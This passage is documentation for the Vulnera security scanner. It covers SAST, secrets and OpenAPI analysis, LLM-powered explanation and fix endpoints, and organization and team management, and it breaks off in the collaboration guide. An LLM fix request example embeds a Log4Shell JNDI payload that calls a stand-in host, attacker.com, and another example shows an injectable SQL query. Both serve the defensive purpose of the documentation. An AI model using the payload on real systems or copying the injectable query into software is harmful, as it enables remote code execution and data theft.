How It Works

Pipeline overview:

  1. Discovery — Walks the project and maps files to supported languages.
  2. Parsing — Builds syntax trees using Tree-sitter (with OXC for JS/TS when enabled).
  3. Rule matching — Applies TOML rule packs to AST patterns.
  4. Taint analysis — Tracks source → sink flow, intra- and inter-procedural.
  5. Call graph — Resolves function calls across files to expand taint reachability.
  6. Post-process — Dedupes, scores confidence/severity, emits unified findings.

Supported Languages

LanguageParserFile Extensions
Pythontree-sitter-python.py
JavaScripttree-sitter-javascript / OXC.js
TypeScripttree-sitter-javascript / OXC.ts
Rusttree-sitter-rust.rs
Gotree-sitter-go.go
Ctree-sitter-c.c, .h
C++tree-sitter-cpp.cpp, .cc, .hpp

Note: JSX/TSX files are not scanned.

Analysis Depth (SAST)

Depth controls the SAST engine’s thoroughness (separate from orchestrator depth):

DepthDescription
quickPattern matching only (no data-flow analysis)
standardPatterns + intra-procedural data flow
deepFull analysis (patterns + data flow + call graph + inter-procedural)

Dynamic depth adjustment is enabled by default. Large repositories are auto-downgraded to keep scans within time budgets. Disable with VULNERA__SAST__DYNAMIC_DEPTH_ENABLED=false.

Rule System

Rules are TOML-based and embedded at build time. You can optionally load Git-based rule packs.

Locations:

  • vulnera-sast/rules/*.toml — core rule packs
  • vulnera-sast/taint-patterns/*.toml — taint sources/sinks/sanitizers
  • vulnera-sast/tests/fixtures/ — CVE fixtures for quality gates

CLI Usage (Actual Flags)

SAST runs via vulnera sast:

# Basic scan
vulnera sast .

# Severity filter
vulnera sast . --min-severity high

# Only changed files (git required)
vulnera sast . --changed-only

# Explicit file list
vulnera sast . --files src/main.rs,src/lib.rs

# Exclude paths (glob patterns)
vulnera sast . --exclude "tests/*,vendor/*"

Available flags:

  • --min-severity <critical|high|medium|low>
  • --fail-on-vuln
  • --changed-only
  • --files <path1,path2,...>
  • --exclude <glob1,glob2,...>
  • --languages <lang1,lang2,...> (override auto-detection)
  • --rules <category1,category2,...> (rule categories)
  • --no-cache (disable incremental cache)
  • --watch (continuous scanning)
  • --fix (LLM-powered bulk fixes; requires online + auth + quota)
  • --baseline <path> (baseline file for diff)
  • --save-baseline (save current findings to baseline)
  • --only-new (report only findings not in baseline)

Output

SAST findings are emitted in the unified finding schema:

  • severity and confidence
  • location (path + line/column)
  • optional snippet and semantic_path (taint trace)

You can emit SARIF:

vulnera sast . --format sarif > report.sarif

Configuration (Server + Library)

The SAST engine is configured via vulnera_core::config::SastConfig and AnalysisConfig.

Key settings:

  • analysis_depth = "quick|standard|deep"
  • js_ts_frontend = "oxc_preferred" | "tree_sitter"
  • enable_data_flow, enable_call_graph
  • enable_ast_cache, ast_cache_ttl_hours
  • dynamic_depth_enabled, file/size thresholds
  • min_finding_severity, min_finding_confidence
  • rule_packs and rule_pack_allowlist

Example (TOML):

[sast]
analysis_depth = "standard"
js_ts_frontend = "oxc_preferred"
enable_data_flow = true
enable_call_graph = true
enable_ast_cache = true
dynamic_depth_enabled = true
min_finding_severity = "low"
min_finding_confidence = "low"

Offline Guarantees

SAST runs fully offline:

  • No network calls
  • All rule packs embedded unless you configure external rule packs

Quality Gates

The SAST module ships with a fixture-based accuracy harness enforced in CI.

Thresholds (from config/default.toml):

  • Precision: ≥ 0.70
  • Recall: ≥ 0.50
  • Unique CWE coverage: ≥ 12
  • Languages with fixtures: ≥ 7

Limitations

  • Tree-sitter is syntax-level; no macro expansion or full type resolution.
  • Dynamic code generation and runtime behavior are out of scope.
  • JSX/TSX files are excluded.

Next Steps

Secrets Detection Module

The Secrets Detection module finds hardcoded credentials and sensitive tokens in source code using regex-based rules and entropy heuristics. It runs fully offline by default, with optional online verification for select providers.


Detection Methods

MethodDescriptionOffline
Regex rulesKnown secret patterns with context keywords✅ Yes
EntropyHigh-entropy token detection (Base64/hex/generic)✅ Yes
VerificationOptional provider checks (AWS/GitHub/GitLab)❌ No

Supported Secret Types

Examples include:

  • Cloud credentials (AWS, Azure, GCP)
  • API keys and tokens (Stripe, Twilio, GitHub, GitLab, generic API keys)
  • OAuth/JWT/Bearer tokens
  • Database connection strings and passwords
  • Private keys (RSA/EC/PGP/SSH)
  • High-entropy strings (Base64/hex/generic tokens)

How It Works

  1. Discovery — Walks files within the scan root.
  2. Regex rules — Applies built-in secret patterns.
  3. Entropy detection — Flags high-entropy strings using thresholds.
  4. Optional verification — Provider-specific checks (disabled by default).
  5. Post-process — Dedupes and emits unified findings.

CLI Usage (Actual Flags)

Secrets detection runs via vulnera secrets:

# Basic scan
vulnera secrets .

# Only changed files (git required)
vulnera secrets . --changed-only

# Specific files
vulnera secrets . --files src/config.rs,src/lib.rs

# Exclude paths (glob patterns)
vulnera secrets . --exclude "tests/*,vendor/*"

# Include entropy-based detections (more noise)
vulnera secrets . --include-entropy

Available flags:

  • --fail-on-secret
  • --changed-only
  • --files <path1,path2,...>
  • --exclude <glob1,glob2,...>
  • --include-tests
  • --include-entropy
  • --no-cache
  • --watch

Output

Secrets findings follow the unified finding schema:

  • secret_metadata is populated
  • vulnerability_metadata may be empty
  • enrichment is optional (LLM)

You can emit SARIF:

vulnera secrets . --format sarif > report.sarif

Configuration (Server + Library)

Secrets detection is configured via vulnera_core::config::SecretDetectionConfig.

Key settings:

  • enable_entropy_detection
  • base64_entropy_threshold, hex_entropy_threshold
  • exclude_patterns, exclude_extensions
  • baseline_file_path, update_baseline
  • scan_git_history, max_commits_to_scan
  • enable_verification (default: false)

Example (TOML):

[secret_detection]
enable_entropy_detection = true
base64_entropy_threshold = 4.5
hex_entropy_threshold = 3.0
exclude_patterns = ["node_modules", ".git", "target"]
exclude_extensions = ["md", "markdown", "rst", "html"]
scan_git_history = false
enable_verification = false

Offline Guarantees

Secrets detection runs fully offline by default:

  • No network calls
  • Regex rules and entropy heuristics are local
  • Verification is opt-in and requires network access

Limitations

  • Entropy detection can surface false positives in test fixtures and generated tokens.
  • Markdown and certain doc extensions are excluded by default unless explicitly included.
  • Verification is limited to supported providers.

Next Steps

Secrets Detection

Vulnera Secrets detects hardcoded credentials and sensitive tokens using regex-based rules and entropy heuristics. It runs fully offline by default, with optional provider verification.

What It Detects

Common categories include:

  • Cloud credentials (AWS, Azure, GCP)
  • API keys and tokens (Stripe, Twilio, GitHub, GitLab, generic API keys)
  • OAuth/JWT/Bearer tokens
  • Database connection strings and passwords
  • Private keys (RSA/EC/PGP/SSH)
  • High-entropy strings (Base64/hex/generic tokens)

How It Works

Pipeline overview:

  1. Discovery — Walks files within the scan root.
  2. Regex rules — Applies built-in secret patterns (rule pack).
  3. Entropy detection — Flags high-entropy strings (Base64/hex + generic heuristics).
  4. Optional verification — Provider-specific verification (disabled by default).
  5. Post-process — Dedupes and emits unified findings.

Detection Methods

MethodDescriptionOffline
Regex rulesKnown secret patterns with context keywords✅ Yes
EntropyHigh-entropy token detection (Base64/hex/generic)✅ Yes
VerificationOptional provider checks (AWS/GitHub/GitLab)❌ No

CLI Usage (Actual Flags)

Secrets detection runs via vulnera secrets:

# Basic scan
vulnera secrets .

# Only changed files (git required)
vulnera secrets . --changed-only

# Specific files
vulnera secrets . --files src/config.rs,src/lib.rs

# Exclude paths (glob patterns)
vulnera secrets . --exclude "tests/*,vendor/*"

# Include entropy-based detections (more noise)
vulnera secrets . --include-entropy

Available flags:

  • --fail-on-secret
  • --changed-only
  • --files <path1,path2,...>
  • --exclude <glob1,glob2,...>
  • --include-tests
  • --include-entropy
  • --no-cache
  • --watch

Output

Secrets findings follow the unified finding schema. For secret findings:

  • secret_metadata is populated
  • vulnerability_metadata may be empty
  • enrichment is optional (LLM)

You can emit SARIF:

vulnera secrets . --format sarif > report.sarif

Configuration (Server + Library)

Secrets detection is configured via vulnera_core::config::SecretDetectionConfig.

Key settings:

  • enable_entropy_detection
  • base64_entropy_threshold, hex_entropy_threshold
  • exclude_patterns, exclude_extensions
  • baseline_file_path, update_baseline
  • scan_git_history, max_commits_to_scan
  • enable_verification (default: false)

Example (TOML):

[secret_detection]
enable_entropy_detection = true
base64_entropy_threshold = 4.5
hex_entropy_threshold = 3.0
exclude_patterns = ["node_modules", ".git", "target"]
exclude_extensions = ["md", "markdown", "rst", "html"]
scan_git_history = false
enable_verification = false

Offline Guarantees

Secrets detection runs fully offline by default:

  • No network calls
  • Regex rules and entropy heuristics are local
  • Verification is opt-in and requires network access

Limitations

  • Entropy detection can surface false positives in test fixtures and generated tokens.
  • Markdown and certain doc extensions are excluded by default unless explicitly included.
  • Verification is limited to supported providers.

Next Steps

API Security

The API Security module analyzes OpenAPI 3.x specifications to identify security vulnerabilities and design misconfigurations before deployment. It runs fully offline and is triggered when an OpenAPI spec is detected (or explicitly provided).

Supported Specifications

  • OpenAPI 3.0
  • OpenAPI 3.1

Analyzer Categories (Actual)

These analyzers run on the parsed OpenAPI spec:

  • Authentication — missing auth, weak schemes (e.g., basic), insecure auth usage
  • Authorization — missing authorization checks, overly permissive access
  • Input Validation — missing request validation, unsafe parameter shapes
  • Data Exposure — sensitive data in URLs/headers, response overexposure
  • Security Headers — missing CSP/HSTS/XFO/XCTO; CORS review
  • OAuth/OIDC — insecure flows, redirect issues, token validation gaps
  • Design — versioning and error-handling issues
  • Security Misconfiguration — insecure defaults and configuration pitfalls
  • Resource Restriction — missing request size/limit constraints

Notable Checks

  • CORS wildcard detection: Access-Control-Allow-Origin: * is flagged as high severity.
  • Missing security headers: required headers are validated per response.
  • Missing authentication: endpoints with no security requirements are flagged.

Configuration

The module is configured via vulnera_core::config::ApiSecurityConfig.

Key settings

  • enabled_analyzers: list of analyzers to run (empty = all)
  • severity_overrides: map of vulnerability type → severity
  • exclude_paths: skip specific API paths
  • strict_mode: more aggressive checks

Example (TOML)

[api_security]
enabled_analyzers = ["authentication", "authorization", "input_validation", "security_headers"]
exclude_paths = ["/health", "/metrics"]
strict_mode = true

[api_security.severity_overrides]
"missing_authentication" = "high"
"insecure_cors" = "high"

CLI Usage

Analyze a spec directly using the CLI:

# Auto-detect spec in a directory
vulnera api .

# Analyze an explicit spec file
vulnera api . --spec ./openapi.yaml

Relevant flags:

  • --spec <path> — explicit OpenAPI spec path
  • --min-severity <critical|high|medium|low>
  • --fail-on-issue
  • --framework <name> (optional)

Output

Findings are emitted in the unified finding schema with:

  • severity and confidence
  • location (path + operation)
  • description and recommendation

SARIF output is supported:

vulnera api . --format sarif > report.sarif

Limitations

  • Relies on the spec as the source of truth — runtime behavior is out of scope.
  • Missing or incomplete specs will limit detection.

Next Steps

LLM Features (Explanations, Fixes, Queries)

Vulnera’s LLM features are post-processing only. Detection is performed by SAST, Secrets, API Security, and Dependency Analysis modules; LLMs are used to explain findings and propose fixes after the scan. LLM calls require network access and valid provider credentials.


What’s Available

1) Explain a Vulnerability (API)

Endpoint:

  • POST /api/v1/llm/explain

Request (example):

{
  "vulnerability_id": "CVE-2021-44228",
  "description": "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP endpoints.",
  "affected_component": "org.apache.logging.log4j:log4j-core",
  "audience": "technical"
}

Response (example):

{
  "explanation": "This vulnerability allows remote code execution because ...",
  "key_points": ["Remote Code Execution", "JNDI Injection", "Critical Severity"],
  "mitigation_steps": ["Upgrade to version 2.15.0", "Disable JNDI lookup"]
}

2) Generate a Code Fix (API)

Endpoint:

  • POST /api/v1/llm/fix

Request (example):

{
  "vulnerability_id": "CVE-2021-44228",
  "vulnerable_code": "logger.error(\"${jndi:ldap://attacker.com/a}\");",
  "language": "java",
  "context": "src/main/java/com/example/App.java"
}

Response (example):

{
  "fixed_code": "logger.error(\"User input: {}\", sanitizedInput);",
  "explanation": "Replaced direct string concatenation with parameterized logging.",
  "confidence": 0.95
}

3) Natural Language Query (API)

Endpoint:

  • POST /api/v1/llm/query

Request (example):

{
  "query": "How do I fix the SQL injection in login.php?",
  "context": { "file": "login.php", "content": "..." }
}

Response (example):

{
  "answer": "Use prepared statements and parameterized queries...",
  "references": ["https://owasp.org/www-community/attacks/SQL_Injection"]
}

4) Enrich Job Findings (API)

Endpoint:

  • POST /api/v1/jobs/{job_id}/enrich

Request (example):

{
  "finding_ids": ["finding_123", "finding_456"],
  "code_contexts": {
    "finding_123": "def login(user, password):\n    query = f\"SELECT * FROM users WHERE user='{user}'\""
  }
}

Response (example):

{
  "job_id": "550e8400-e29b-41d4-a716-446655440000",
  "enriched_count": 5,
  "failed_count": 1,
  "findings": [
    { "id": "finding_123", "severity": "Critical", "description": "SQL Injection...", "location": "src/auth.py:42:10", "explanation": "...", "remediation_suggestion": "Use parameterized queries..." }
  ]
}

CLI Support

Generate a Fix (CLI)

Command:

  • vulnera generate-fix

Usage:

vulnera generate-fix \
  --vulnerability CVE-2021-44228 \
  --code src/main/java/com/example/App.java \
  --line 42

Notes:

  • Requires online mode, authentication, and available quota.
  • If offline, unauthenticated, or quota exceeded, the command exits with an error code.

Bulk SAST Fix Suggestions (CLI)

Command:

  • vulnera sast --fix

Usage:

vulnera sast . --fix

Notes:

  • Runs SAST locally, then uses the server for LLM-powered fix suggestions.
  • Requires online mode and authentication.

Provider Configuration

LLM providers are configured via vulnera_core::config::LlmConfig and environment variables.

Provider Selection

  • VULNERA__LLM__PROVIDER = google_ai | openai | azure
  • VULNERA__LLM__DEFAULT_MODEL
  • VULNERA__LLM__TEMPERATURE
  • VULNERA__LLM__MAX_TOKENS
  • VULNERA__LLM__TIMEOUT_SECONDS
  • VULNERA__LLM__ENABLE_STREAMING

Google AI (Gemini)

  • GOOGLE_AI_KEY
  • VULNERA__LLM__GOOGLE_AI__BASE_URL

OpenAI

  • OPENAI_API_KEY
  • VULNERA__LLM__OPENAI__BASE_URL
  • VULNERA__LLM__OPENAI__ORGANIZATION_ID

Azure OpenAI

  • AZURE_OPENAI_KEY
  • VULNERA__LLM__AZURE__ENDPOINT
  • VULNERA__LLM__AZURE__DEPLOYMENT
  • VULNERA__LLM__AZURE__API_VERSION

Quota and Cost

LLM operations are higher-cost than standard analysis:

  • Analysis: 3 tokens
  • LLM (explain/fix/query): 6 tokens

Use LLM sparingly for high-severity findings, and prefer batch enrichment for efficiency.


Troubleshooting

LLM requests fail in offline mode LLM requires network access. Remove --offline and ensure the server is reachable.

Authentication required Run vulnera auth login or set VULNERA_API_KEY.

Quota exceeded Check vulnera quota and reduce LLM usage or wait for reset.


Next Steps

Web Dashboard (API-First Guidance)

Vulnera is API-first and does not ship a bundled web UI in this repository. If you need a dashboard, use the API endpoints below to build your own UI or integrate with existing tools.


Core API Endpoints

Health & Docs

  • GET /health — service health
  • GET /metrics — metrics endpoint
  • GET /docs — Swagger UI (if enabled)
  • GET /api-docs/openapi.json — OpenAPI spec

Jobs & Analysis

  • POST /api/v1/analyze/job — create analysis job
  • GET /api/v1/jobs/{id} — get job status/result

Organizations

  • POST /api/v1/organizations — create organization
  • GET /api/v1/organizations — list organizations
  • GET /api/v1/organizations/{id} — organization details
  • PUT /api/v1/organizations/{id} — update organization
  • DELETE /api/v1/organizations/{id} — delete organization
  • GET /api/v1/organizations/{id}/members — list members
  • POST /api/v1/organizations/{id}/members — invite member
  • DELETE /api/v1/organizations/{id}/members/{user_id} — remove member
  • POST /api/v1/organizations/{id}/leave — leave organization
  • POST /api/v1/organizations/{id}/transfer — transfer ownership

Analytics & Quota

  • GET /api/v1/organizations/{id}/analytics/dashboard — org dashboard stats
  • GET /api/v1/organizations/{id}/analytics/usage — org usage
  • GET /api/v1/organizations/{id}/analytics/quota — org quota
  • GET /api/v1/me/analytics/dashboard — personal dashboard stats
  • GET /api/v1/me/analytics/usage — personal usage
  • GET /api/v1/quota — quota usage

LLM Features (Optional)

  • POST /api/v1/llm/explain
  • POST /api/v1/llm/fix
  • POST /api/v1/llm/query
  • POST /api/v1/jobs/{job_id}/enrich

Authentication & Security

  • Cookie auth uses JWT + CSRF.
  • API key auth uses X-API-Key header.
  • CORS must be configured for your UI origin.
  • Swagger UI can be disabled in production via config.

Building Your Own Dashboard

A minimal dashboard typically includes:

  1. Organization selector
  2. Recent jobs list (/organizations/{id}/analytics/dashboard)
  3. Findings view (from job detail: /jobs/{id})
  4. Quota widget (/organizations/{id}/analytics/quota or /api/v1/quota)
  5. Usage charts (/organizations/{id}/analytics/usage)

Configuration Reference

See:


Next Steps

Organization Management Guide

Organizations in Vulnera enable team collaboration with shared quotas, centralized reporting, and role-based access control. This guide covers everything you need to manage your organization effectively.

Creating an Organization

Step-by-Step Setup

  1. Navigate to Organization Creation

    • Click + New Organization in the sidebar
    • Or go to Dashboard → Organizations → Create New
  2. Fill in Organization Details

    • Organization Name — Your company or team name (e.g., “Acme Security Team”)
    • Description — Brief description of the organization’s purpose
    • Logo — Optional: Upload organization logo (PNG, JPG, 512×512px recommended)
    • Contact Email — Primary contact for billing and notifications
  3. Select Plan Tier

    • Free — 48 tokens/month, up to 5 members, basic integrations
    • Pro — 1000 tokens/month, unlimited members, advanced integrations
    • Enterprise — Custom tokens, SSO/SAML, custom domains, priority support
  4. Confirm Creation

    • Review settings
    • Click Create Organization
    • You’re automatically made Owner and Organization Admin

Post-Creation Setup Checklist

  • Upload organization logo
  • Add organization description
  • Set up billing (if on paid plan)
  • Invite team members
  • Generate API key
  • Configure integrations
  • Set notification preferences

Organization Roles & Permissions

Role Hierarchy

Owner
  ↓ (can delegate to)
Admin
  ↓ (can delegate to)
Member
Viewer (read-only)

Detailed Permissions Matrix

PermissionOwnerAdminMemberViewer
Scans
Create scans
View scans
Delete scans
Export scan results
Findings
View findings
Resolve findings
Mark false positive
Organization Settings
View settings
Modify general info
Manage members
Manage API keys
Billing & Subscriptions
View billing
Manage billing
Upgrade plan
Integrations
View integrations
Configure integrations
Manage webhooks
Audit & Compliance
View audit logs
Export organization data
Delete organization

When to Use Each Role

  • Owner — Organization founders, ultimate decision-makers, billing contact

    • Best for: 1-2 key decision-makers per organization
    • Caution: Rarely needed, keep minimal
  • Admin — Team leads, security directors, technical leads

    • Best for: Day-to-day organization management
    • Responsibility: Member provisioning, integration setup
  • Member — Developers, security engineers, DevOps engineers

    • Best for: Active security practitioners who scan code
    • Permissions: Run scans, view/resolve findings
  • Viewer — Executives, managers, stakeholders (read-only)

    • Best for: Non-technical decision-makers who need visibility
    • Permissions: View scans, findings, reports (no modifications)

Managing Team Members

Inviting Members

Method 1: Dashboard Invitation

  1. Go to Settings → Members
  2. Click Invite Member
  3. Enter email address(es) — comma-separated for bulk invite
  4. Select role for each member:
    • Admin (for team leads)
    • Member (for developers)
    • Viewer (for stakeholders)
  5. Click Send Invitations
  6. Members receive email with join link (valid for 7 days)

Method 2: Share Organization Link

  1. Go to Settings → Members → Copy Share Link
  2. Share link with team (anyone with link can request access)
  3. Requests appear in pending approval queue
  4. Admin reviews and approves/denies

Accepting an Invitation

Members receive email from invite@vulnera.studio:

  1. Click Join Organization link
  2. Sign in to Vulnera account (create if needed)
  3. Click Accept Invitation
  4. Redirect to organization dashboard
  5. Immediately have access to shared quota and scans

Member Status States

StatusDescriptionAction
InvitedEmail sent, awaiting acceptanceCan resend invite or cancel
ActiveMember joined and has accessCan change role or remove
Pending ApprovalJoin request submitted (if approval required)Admin can approve/deny
InactiveMember inactive >30 daysCan reactivate or remove
RemovedFormer member, no accessCan reinvite

Changing Member Roles

  1. Go to Settings → Members
  2. Find member in list
  3. Click member row → Edit
  4. Change role dropdown
  5. Click Save — changes take effect immediately
  6. Member receives notification of role change

Removing Members

  1. Go to Settings → Members
  2. Click member → Remove
  3. Confirm removal
  4. Member loses all access immediately
  5. Their scans remain in history (read-only for audit purposes)

Note: Removed members can be reinvited later.

Viewing Member Activity

Member Details Page:

  1. Go to Settings → Members
  2. Click member name
  3. View:
    • Email address, role, join date
    • Last active timestamp
    • Scans created by member
    • API keys generated by member
    • Activity timeline

Organization Audit Log (Admin only):

  1. Go to Settings → Audit Log
  2. Filter by member:
    • Action type (invited, removed, scan created, etc.)
    • Member email
    • Date range
  3. Export as CSV for compliance

Shared Quota Management

Understanding Organization Quotas

When members scan within an organization, tokens are consumed from the shared organization quota, not individual quotas.

Example:

  • Organization quota: 1000 tokens/month (Pro plan)
  • Member A creates scan: uses 10 tokens from shared pool
  • Member B creates scan: uses 15 tokens from shared pool
  • Remaining: 975 tokens available to all members

Quota Allocation Strategies

Strategy 1: Fully Shared (Default)

  • All members share single quota pool
  • Transparent: Anyone can see total usage
  • Best for: Small, collaborative teams

Strategy 2: Department Quotas (Enterprise)

  • Divide quota by team (e.g., 400 tokens/Backend team, 300/Frontend)
  • Managed via API or contact sales
  • Best for: Large organizations with multiple teams

Strategy 3: Per-Member Budgets (Enterprise)

  • Set individual limits per member (e.g., 50 tokens/developer)
  • Prevents single member from exhausting quota
  • Best for: Organizations with varied usage patterns

Monitoring Quota Usage

Organization Dashboard:

  1. Go to Organization → Analytics → Dashboard
  2. View:
    • Total tokens used this month
    • Tokens remaining
    • Usage trend graph (last 6 months)
    • Per-member breakdown table

Usage Breakdown:

Total: 850 / 1000 tokens used (85%)

By Module:
├── Dependency Analysis: 450 tokens (53%)
├── SAST: 300 tokens (35%)
├── Secrets: 75 tokens (9%)
└── API Security: 25 tokens (3%)

By Member:
├── alice@acme.com: 400 tokens (47%)
├── bob@acme.com: 300 tokens (35%)
└── charlie@acme.com: 150 tokens (18%)

Setting Quota Alerts

Configure notifications when quota usage reaches thresholds:

  1. Go to Settings → Notifications → Quota Alerts
  2. Enable alerts at:
    • 50% usage
    • 75% usage
    • 90% usage
    • 100% (exhausted)
  3. Choose notification method:
    • Email (sent to organization contact)
    • Slack (if integrated)
    • In-app notification
  4. Save

Upgrading Quota

Option 1: Upgrade Plan

  • Free → Pro: +952 tokens (1000 total)
  • Pro → Enterprise: Custom allocation
  • Go to Settings → Billing → Upgrade Plan

Option 2: Temporary Quota Boost (Enterprise)

  • Purchase additional tokens mid-month
  • Contact sales@vulnera.studio
  • Available for 30 days, expires unused

Organization Settings

General Settings

Organization Profile:

  • Organization name
  • Description
  • Logo (upload new or remove)
  • Contact email
  • Website URL (optional)

Edit: Settings → General → Edit Profile

Security Settings

Two-Factor Authentication (for members):

  • Require 2FA for all members (optional, Admin sets)
  • Go to Settings → Security → Require 2FA

Session Management:

  • Session timeout: 30 minutes (default)
  • Custom timeout available (Enterprise)
  • Go to Settings → Security → Session Policy

IP Whitelisting (Enterprise):

  • Restrict access to specific IP ranges
  • Useful for VPN-only access
  • Go to Settings → Security → IP Whitelist

SSO/SAML (Enterprise):

  • Single sign-on via Okta, Azure AD, Google Workspace
  • Auto-provisioning of team members
  • Go to Settings → Security → SSO Configuration

Data & Privacy

Data Retention Policy:

  • Set how long scan results are kept (30 days to 2 years)
  • Default: 1 year
  • Go to Settings → Data → Retention Policy

Data Export:

  • Export all organization data (GDPR compliance)
  • Includes scans, findings, member list, audit logs
  • Go to Settings → Data → Export Organization Data

Data Deletion:

  • Permanently delete organization and all data (irreversible)
  • Requires Owner password confirmation
  • Go to Settings → Data → Delete Organization

Billing & Subscriptions

View Subscription:

  1. Go to Settings → Billing → Subscription
  2. View:
    • Current plan (Free/Pro/Enterprise)
    • Billing cycle (monthly/annual)
    • Next billing date
    • Annual savings (if on annual plan)

Update Payment Method:

  1. Go to Settings → Billing → Payment Method
  2. Click Edit
  3. Update card details or select different card
  4. Click Save

Invoices & History:

  1. Go to Settings → Billing → Invoices
  2. View all past invoices (searchable)
  3. Download as PDF
  4. Filter by date range

Upgrade/Downgrade Plan:

  1. Go to Settings → Billing → Change Plan
  2. Select new plan
  3. Review pricing impact
  4. Click Confirm Upgrade/Downgrade
  5. Changes take effect immediately (or at next cycle)

Integrations & Webhooks

Slack Integration

Setup:

  1. Go to Settings → Integrations → Slack
  2. Click Connect Slack Workspace
  3. Select Vulnera workspace and authorize
  4. Select notification channel
  5. Enable notification types:
    • Critical findings
    • Daily summary
    • Weekly report
    • Quota alerts

Slack Notifications Example:

🚨 Critical Vulnerability Detected
Repository: acme/backend
Finding: SQL Injection in POST /api/users
Severity: Critical (CVSS 9.2)
Module: SAST
👉 View Details

Disable Slack:

  • Go to Settings → Integrations → Slack
  • Click Disconnect

GitHub Integration

Setup:

  1. Go to Settings → Integrations → GitHub
  2. Click Connect GitHub
  3. Authorize Vulnera GitHub App
  4. Select repositories to scan
  5. Configure auto-scan triggers:
    • On push to main/develop
    • On all pull requests
    • Scheduled daily

GitHub Features:

  • PR comments with findings
  • Status checks (block merge if critical)
  • SARIF upload to code scanning
  • Auto-create issues for high-severity findings

Manage Repositories:

  • Add new repos: Settings → Integrations → GitHub → Add Repository
  • Remove repos: Settings → Integrations → GitHub → Remove (⋯)

GitLab Integration

Setup (via CI/CD):

In .gitlab-ci.yml:

vulnera-scan:
  image: vulnera:latest
  script:
    - vulnera auth login --api-key $VULNERA_API_KEY
    - vulnera analyze . --all-modules --format sarif > vulnera.sarif
  artifacts:
    reports:
      sast: vulnera.sarif
    paths:
      - vulnera.sarif
  allow_failure: true

Webhooks

Create Webhook:

  1. Go to Settings → Webhooks → Add Webhook
  2. Enter webhook URL (must be HTTPS)
  3. Select events:
    • scan.started — Analysis job started
    • scan.completed — Analysis finished
    • finding.created — New vulnerability detected
    • finding.resolved — Manually marked resolved
  4. (Optional) Set webhook secret for signature verification
  5. Click Create

Test Webhook:

  1. Go to Settings → Webhooks
  2. Find webhook in list
  3. Click Test → sends sample payload to URL
  4. View response status and body

Webhook Payload:

{
  "event": "scan.completed",
  "scan_id": "scan-abc123def456",
  "organization_id": "org-xyz789",
  "project": {
    "name": "acme/backend",
    "source": "github",
    "url": "https://github.com/acme/backend"
  },
  "analysis_results": {
    "total_findings": 12,
    "critical": 2,
    "high": 5,
    "medium": 4,
    "low": 1
  },
  "modules_run": [
    "dependencies",
    "sast",
    "secrets"
  ],
  "timestamp": "2024-01-15T14:30:00Z",
  "duration_seconds": 245
}

Webhook Security:

  • Always use HTTPS
  • Verify webhook signature on your server
  • Signature header: X-Vulnera-Signature: sha256=<hash>
  • Implement timeout/retry logic

Audit & Compliance

Audit Log

Organization admins can view all member actions and configuration changes.

Access Audit Log:

  1. Go to Settings → Audit Log
  2. View entries (newest first):
    • Timestamp
    • Member email
    • Action (invited, scan created, key generated, etc.)
    • Resource affected
    • IP address

Filter Audit Log:

  • By action type (Member activity, Configuration, Scan, Integration)
  • By member email
  • By date range
  • By resource (scan ID, API key ID, etc.)

Export Audit Log:

  1. Go to Settings → Audit Log → Export
  2. Select date range
  3. Choose format: CSV or JSON
  4. Download file

Audit Log Retention:

  • Free plan: 30 days
  • Pro: 90 days
  • Enterprise: 2 years (configurable)

Compliance Reports

Generate Compliance Report:

  1. Go to Reports → Compliance Reports
  2. Select framework:
    • SOC2 Type II
    • ISO 27001
    • GDPR
    • HIPAA (Enterprise)
    • PCI DSS (Enterprise)
  3. Select date range
  4. Click Generate
  5. Download as PDF

Report Contents:

  • Organization access controls summary
  • Member provisioning/deprovisioning records
  • Security incident history
  • Data handling practices
  • Audit log excerpts

Best Practices

Organization Structure

Small Teams (1-10 members):

  • 1 Owner
  • 1-2 Admins
  • Rest as Members/Viewers
  • Shared quota sufficient

Medium Teams (10-50 members):

  • 1 Owner
  • 3-5 Admins (by department/team)
  • Members/Viewers as needed
  • Consider department quotas (Enterprise)

Large Organizations (50+ members):

  • 1 Owner
  • 10+ Admins (by team/geography)
  • Hierarchical teams (Enterprise)
  • Custom RBAC roles (Enterprise)
  • SSO/SAML mandatory

Member Lifecycle

Onboarding:

  1. Invite new member with appropriate role
  2. Have member review organization settings
  3. Add to Slack channel notifications
  4. Provide API key for CLI (if Member/Admin)
  5. Confirm first scan works

Offboarding:

  1. Remove member from organization
  2. Revoke API keys (if any)
  3. Review scans they created (for audit)
  4. Export member’s contributions (if needed)
  5. Archive related configurations

Security Practices

Do:

  • Assign minimal required role (principle of least privilege)
  • Use Viewers for non-technical stakeholders
  • Rotate API keys every 90 days
  • Enable 2FA for all members (if available)
  • Audit member list quarterly
  • Review audit logs monthly
  • Enable webhook signature verification

Don’t:

  • Share API keys between members
  • Grant Owner role to multiple people
  • Use generic/shared email addresses
  • Disable audit logging
  • Leave unused integrations connected
  • Ignore quota warnings

Troubleshooting

Q: Member invited but never received email

A: 1. Check their spam folder
   2. Resend invite: Settings → Members → Resend
   3. Verify email address spelling
   4. Check if email is already registered (member may self-join)

Q: Member can’t see organization scans

A: 1. Verify member role is not Viewer
   2. Confirm member accepted invitation
   3. Member should log out and log back in
   4. Clear browser cache
   5. Check audit log for removal records

Q: API key not working for organization scans

A: 1. Verify key belongs to org admin/member
   2. Check key hasn't expired (Settings → API Keys)
   3. Confirm key has org scope (not just personal)
   4. Regenerate if needed
   5. Verify member role allows scan creation

Q: Quota exhausted early

A: 1. Review usage (Analytics → Dashboard)
   2. Check for duplicate scans
   3. Optimize scan targets (exclude node_modules, etc.)
   4. Upgrade plan (Settings → Billing)
   5. Contact sales for temporary boost (Enterprise)

Q: How to transfer organization ownership

A: 1. Owner adds desired new owner as Admin
   2. New owner transfers via Settings → Transfer Ownership
   3. Current owner confirms transfer
   4. Former owner demoted to Admin automatically

Next Steps

  • Set Up Integrations — Connect Slack, GitHub for automated workflows
  • Configure Webhooks — Feed findings to your ticketing system
  • Generate Your First Report — Create compliance or executive summary report
  • Audit Organization — Review member list and access quarterly

For team collaboration workflows, see Team Collaboration Guide. For dashboard features, see Dashboard Guide.


Need help? Email support@vulnera.studio or visit our FAQ.

Team Collaboration Guide

Vulnera enables seamless collaboration across security teams, DevOps, and developers. This guide covers workflows for shared vulnerability analysis, coordinated remediation, and team-based security practices.

Collaboration Workflows

Shared Analysis Setup

Scenario: Security team wants developers to run scans and review findings together

  1. Create Organization

    • Go to Dashboard → + New Organization
    • Name: “Engineering Security”
    • Add organization description
  2. Invite Team Members

    • Go to Settings → Members → Invite Member
    • Invite developers with Member role (can create scans, resolve findings)
